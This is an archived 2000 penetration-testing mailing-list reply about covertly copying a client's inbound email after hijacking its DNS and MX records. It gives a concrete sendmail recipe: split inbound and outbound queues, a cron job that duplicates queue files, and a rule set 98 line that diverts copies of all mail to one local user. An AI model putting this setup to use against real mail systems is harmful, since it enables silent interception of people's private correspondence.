Home page logo

pen-test logo Penetration Testing mailing list archives

Re: [PEN-TEST] Sendmail: Keeping a copy of relayed email
From: Andrew Brown <atatat () ATATDOT NET>
Date: Fri, 1 Sep 2000 14:28:04 -0400

I am currently looking into the possibility of eavesdropping a client's
inbound email as part of a penetration test.  I have about 75% of the
problem worked out, but I would really like some help with the last 25%.

I have figured a way that I can take over DNS authority for their domain
name, and then set up my own DNS server to serve their records.  Once this
is in place I will set up one of my machines as their primary MX.  On this
machine I will use sendmail's mailertable feature to get their incoming
email to their email server.

My problem is - I want to keep a copy of the incoming email that I relay
off my machine.

An associate has suggested that I would need to hand-hack the sendmail.cf
file to add another (local) recipient into the mail delivery before it is
sent off to mailertable for delivery.  My sendmail skills aren't quite up
to this level, and I wondered if anybody has ideas on how I can turn this
into a reality?  Anybody done something like this before?  Anybody seen a
how-to on this?  Anybody provide some pointers to a quick head's-up on
sendmail.cf delivery rule hacking?

off the top of my head, i'd guess that using separate inbound (one)
and outbound queues (two) would do the trick.  then run three daemons
and a cron job as follows:

(1) listens on port 25 for inbound mail, drops it in (for lack of a
better named) /var/spool/mqueue-i.  sendmail.cf changes: delivery mode
set to queue only.

(2) the cron job periodically (every five to fifteen minutes) copies
all the queue files to /var/spool/mqueue-o1 and /var/spool/mqueue-o2.

(3) the second sendmail daemon runs queue-o1 and has the relay (either
DR, DS, or DH, i'm not sure which, nor how much it matters) set to the
mx host of the actual company.  2nd sendmail.cf changes: set one of
the aforementioned variables.

(4) the third sendmail daemon runs queue-o2 and just delivers
*everything* locally to one user.  3rd sendmail.cf changes: one line
added to rule set 98 as follows:

     R $*<@$*>$*                     $#local $: bnite

the queue runners could easily be started from the cron job,
presumably based on the presence of actual files in their respective

alternately you could just save up the queue files in queue-o2 so that
the envelope information is intact.

|-----< "CODE WARRIOR" >-----|
codewarrior () daemon org             * "ah!  i see you have the internet
twofsonet () graffiti com (Andrew Brown)                that goes *ping*!"
andrew () crossbar com       * "information is power -- share the wealth."

  By Date           By Thread  

Current thread:
  • Re: [PEN-TEST] Sendmail: Keeping a copy of relayed email Andrew Brown (Sep 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]